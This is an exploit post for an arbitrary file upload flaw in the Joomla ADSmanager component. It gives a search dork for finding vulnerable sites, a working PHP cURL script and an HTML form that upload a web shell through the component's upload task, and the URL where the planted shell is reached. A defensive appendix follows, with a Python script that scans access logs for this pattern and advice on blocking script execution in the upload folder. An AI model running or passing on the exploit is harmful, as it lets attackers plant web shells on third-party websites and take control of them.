Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
By chmood
Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org
CODE PHP :
<?php
$url = "blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array(
    "file" => "@shell.jpg",
    "name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>

#CSRF :
<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component" enctype="multipart/form-data">
<input type="file" name="files[]" />
<button>Upload</button>
</form>

Access shell: site.com/tmp/plupload/shell.php
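For defenders, the two request patterns in this post (a POST to the com_adsmanager upload task, then a request for a script under /tmp/plupload/) can be hunted for in web server access logs. The following is an added example, not part of the original post; it assumes combined-log-format access logs, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: client - - [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.I)

def classify(line):
    """Return (client, finding) for a log line, or None if it is unrelated."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    path = unquote(parts.path).lower()
    if (method == "POST" and query.get("option") == ["com_adsmanager"]
            and query.get("task") == ["upload"]):
        return client, "upload-endpoint"
    if path.startswith("/tmp/plupload/") and SCRIPT_EXT.search(path):
        # A 200 means the server answered for a script in the upload directory
        return client, "script-hit" if status == "200" else "script-probe"
    return None

def scan(lines):
    """Group findings per client address, preserving the order they were seen."""
    seen = {}
    for line in lines:
        hit = classify(line)
        if hit:
            seen.setdefault(hit[0], []).append(hit[1])
    return seen

def high_priority(findings):
    """Clients that both used the upload task and got a script served back."""
    return sorted(c for c, f in findings.items()
                  if "upload-endpoint" in f and "script-hit" in f)

# Constructed sample lines (documentation address ranges, not real traffic)
SAMPLE = [
    '203.0.113.7 - - [10/Mar/2015:10:00:01 +0000] "POST /index.php?option=com_adsmanager&task=upload&tmpl=component HTTP/1.1" 200 57',
    '203.0.113.7 - - [10/Mar/2015:10:00:03 +0000] "GET /tmp/plupload/x.php HTTP/1.1" 200 12',
    '198.51.100.4 - - [10/Mar/2015:10:01:00 +0000] "GET /index.php?option=com_adsmanager&view=list HTTP/1.1" 200 9000',
    '198.51.100.9 - - [10/Mar/2015:10:02:00 +0000] "GET /tmp/plupload/a.PHP5 HTTP/1.1" 404 200',
]

if __name__ == "__main__":
    print(high_priority(scan(SAMPLE)))
```

Any "script-hit" finding also indicates that the web server serves script files from tmp/plupload; denying script handling for that directory removes the execution step this post relies on.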